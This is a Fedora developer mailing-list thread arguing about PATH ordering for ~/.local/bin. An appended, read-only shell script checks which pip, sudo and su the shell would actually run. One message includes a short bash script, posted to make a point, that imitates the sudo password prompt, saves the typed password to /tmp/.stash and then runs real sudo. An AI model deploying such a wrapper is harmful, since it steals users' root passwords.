On 05/02/2018 11:57 PM, Iain Rae wrote:

On 02/05/18 17:50, Kamil Dudka wrote:
On Wednesday, May 2, 2018 4:25:58 PM CEST Iain Rae wrote:
if they've got sudo privs to install software in the system area as root
then any malicious program is going to emulate su/sudo in which case
you're rooted in both scenarios.
In order to emulate su/sudo, the binary needs to have special permissions.
Programs downloaded by web browsers do not get them and non-privileged users
cannot grant such permissions.
ah so something like :

#!/bin/bash
ME=`whoami`
echo [sudo] password for $ME
read -s PASSWD
echo $PASSWD >> /tmp/.stash
echo $PASSWD |sudo -S $* > /dev/null

probably wouldn't work then ;)




I just wanted to say that many users would not need sudo access at all if they
were able to install software to their home directory in a way that it works
out of the box.
oh yes, that would be the ideal situation, and if ~/.login/bin is so
standard you'd think that things like pip would check to see if there
was a more up to date version of themselves in there and run it rather
than the system installation.

pip actually checks if ~/.local/bin is on the PATH and prints a warning if it isn't. But nobody predicted that ~/.local/bin might be on the PATH but only behind /usr/bin. That breaks the intuitive expectation that things installed closer to the user should take priority. Python works like that.

Tomas





Kamil




_______________________________________________
devel mailing list -- devel@lists.fedoraproject.org
To unsubscribe send an email to devel-le...@lists.fedoraproject.org
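
Added example, not part of the thread: a read-only shell check of the PATH ordering discussed above, showing whether ~/.local/bin is searched before or after /usr/bin and which copy of a command (pip, sudo, su) the shell would actually run. The helper names dir_index, user_bin_order and resolve_in are illustrative assumptions.

```shell
#!/bin/sh
# Added example, not from the thread. Helper names are illustrative.

# dir_index DIR PATHSTR: print the 1-based position of DIR in PATHSTR, 0 if absent.
# Body runs in a subshell so the IFS and globbing changes do not leak.
dir_index() (
    target=${1%/}; i=0; found=0
    IFS=:; set -f
    for d in $2; do
        i=$((i + 1))
        if [ "$found" -eq 0 ] && [ "${d%/}" = "$target" ]; then found=$i; fi
    done
    echo "$found"
)

# user_bin_order PATHSTR USERBIN: is USERBIN searched before or after /usr/bin?
user_bin_order() (
    u=$(dir_index "$2" "$1"); s=$(dir_index /usr/bin "$1")
    if [ "$u" -eq 0 ]; then echo missing
    elif [ "$s" -eq 0 ] || [ "$u" -lt "$s" ]; then echo before
    else echo after
    fi
)

# resolve_in NAME PATHSTR: print the first executable NAME found in PATHSTR order.
resolve_in() (
    IFS=:; set -f
    for d in $2; do
        if [ -n "$d" ] && [ -f "$d/$1" ] && [ -x "$d/$1" ]; then
            echo "$d/$1"; return 0
        fi
    done
    return 1
)

# Read-only report for the current session.
echo "\$HOME/.local/bin vs /usr/bin: $(user_bin_order "$PATH" "$HOME/.local/bin")"
for cmd in pip sudo su; do
    echo "$cmd -> $(resolve_in "$cmd" "$PATH" || echo 'not found')"
done
```

A result of "after" is the ordering described in the last reply, where the system copy wins; "before" means anything placed in the user-writable directory takes precedence over the system command of the same name.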
